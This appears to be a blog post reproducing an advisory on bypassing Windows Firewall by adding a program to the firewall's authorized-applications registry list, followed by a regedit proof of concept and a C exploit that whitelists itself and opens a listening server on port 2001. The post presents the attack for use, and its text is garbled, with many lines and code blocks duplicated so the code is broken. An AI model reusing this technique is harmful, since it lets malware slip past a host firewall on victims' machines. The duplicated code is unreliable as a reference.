Bypassing Windows Firewall :-
There is a technique using which we can bypass windows firewall.
This techniques is nothing but the vulnerability found in windows firewall.
This is explained here in detail with exploit code.
Windows Firewall Bypassing (Registry Based) :- Microsoft Windows comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.
Credit :-
The information has been provided by Mark Kica.
The original article can be found at: http://taekwondo-itf.szm.sk/bugg.zip
Vulnerable
Systems :-
* Microsoft Windows
* Microsoft Windows
Windows Firewall has list of
allowed program in registry which are not properly protected from modification
by a malicious local attacker.
If an attacker adds a new key to the
registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List,
the attacker can enable his malware or Trojan to connect to the Internet
without the Firewall triggering a warning.
Proof of
Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat
Exploit :-
#include <stdio.h>
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include "Shlwapi.h"
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include "Shlwapi.h"
int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
int i;
GetModuleFileName(NULL, filename,
1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ,
buffer, strlen(buffer));
int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server
example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
fprintf(stdout, "Dedicated to Katka H. from Levoca \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
fprintf(stdout, "Dedicated to Katka H. from Levoca \n");
sleep(3);
if ((sockfd = ezsocket(NULL, NULL,
2001, SERVER)) == -1)
return 0;
return 0;
for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct
sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
fprintf(stdout, "Sended: Hello World\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
fprintf(stdout, "Sended: Hello World\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer,
"quit"))
break;
}
break;
}
ezsocket_exit();
return 0;
}
return 0;
}
/* EoF */
No comments:
Post a Comment